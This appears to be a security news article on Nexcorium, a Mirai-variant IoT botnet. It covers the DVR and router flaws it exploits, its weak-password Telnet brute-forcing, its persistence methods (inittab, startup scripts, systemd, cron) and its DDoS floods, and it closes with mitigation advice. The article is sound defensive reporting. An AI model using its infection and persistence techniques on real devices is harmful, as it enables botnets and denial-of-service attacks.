Nexcorium Malware Variant Emerges, Targeting Unpatched IoT Devices
A newly identified variant of Mirai malware, dubbed Nexcorium, is actively exploiting vulnerabilities in unpatched Internet of Things (IoT) devices, raising alarms in cybersecurity communities. Recent threat research from FortiGuard Labs highlights that attackers are leveraging a critical vulnerability found in TBK DVR systems to orchestrate a massive botnet, capable of executing devastating distributed denial-of-service (DDoS) attacks.
The primary focus of this campaign is the CVE-2024-3721, a severe operating system command injection flaw that affects specific models of TBK DVRs, namely the DVR-4104 and DVR-4216. Cybercriminals exploit this vulnerability to bypass existing security measures, delivering a malicious downloader script that enables further intrusion.
FortiGuard Labs’ analysis unveiled a distinctive feature within the attack traffic: a custom HTTP header reading “X-Hacked-By: Nexus Team – Exploited By Erratic.” This unique identifier suggests a strong connection between the malicious activities and an emerging threat actor known as the Nexus Team.
Malware Behavior and Rapid Spread
Once the initial downloader script is executed, it retrieves the Nexcorium payload. This malware boasts a remarkable adaptability, enabling it to infect various Linux device architectures, including ARM, MIPS, and x86-64. Upon a successful execution, the malware displays an ominous system message: “nexuscorp has taken control.”
Functioning similarly to traditional Mirai botnets, Nexcorium enhances its spreading techniques aggressively. After successfully infecting a host device, the malware scans the internet for other vulnerable targets. Additionally, it includes an exploit aimed specifically at hijacking Huawei HG532 routers (CVE-2017-17215) and employs a hard-coded dictionary of commonly used weak passwords, such as “admin,” “12345,” and “guest,” to brute-force access to other exposed devices via Telnet connections.
Persistence Mechanisms
In order to maintain its foothold, Nexcorium utilizes a multi-layered approach to ensure persistence. The malware embeds itself deeply within system directories and implements multiple backup mechanisms:
-
Init Configuration: It alters the
/etc/inittabfile to ensure that the malicious process restarts if it ever crashes. -
Startup Scripts: The malware modifies local startup files to guarantee execution as soon as the system boots.
-
Systemd Services: Nexcorium creates a hidden background service that runs automatically without requiring user interaction.
- Cron Jobs: It schedules routine tasks to relaunch itself periodically.
To conceal its presence from security analysts and antivirus measures, Nexcorium deletes its original installation files after securing its persistent foothold.
Objectives and Attack Methods
The ultimate objective of the Nexcorium botnet is to initiate catastrophic DDoS attacks. The malware establishes communication with a remote command-and-control server, which issues targeting directives. FortiGuard Labs has reported that Nexcorium is exceptionally versatile, supporting various attack methods, including UDP floods, TCP SYN floods, and SMTP floods. This versatility enables the Nexus Team to overwhelm a range of networks, applications, and web servers.
Mitigation Strategies
As IoT botnets like Nexcorium continue to proliferate, it is crucial for organizations and network administrators to adopt proactive defensive measures. Recommendations include:
-
Firmware Updates: All DVRs, routers, and IoT hardware should be updated with the latest vendor patches.
-
Strengthened Passwords: Replace default device credentials with strong, unique passwords to thwart brute-force attempts.
-
Network Access Restrictions: Disable external Telnet access and minimize the internet exposure of critical networked devices.
- Traffic Monitoring: Vigilantly monitor network traffic for unusual outbound connections, especially signs of automated scanning behavior.
In conclusion, with the emergence of the Nexcorium malware variant, vigilance and immediate action are critical in protecting against potential threats targeted at IoT devices. Organizations must remain proactive in addressing vulnerabilities and securing their networks to mitigate the risks posed by evolving threats in the cybersecurity landscape.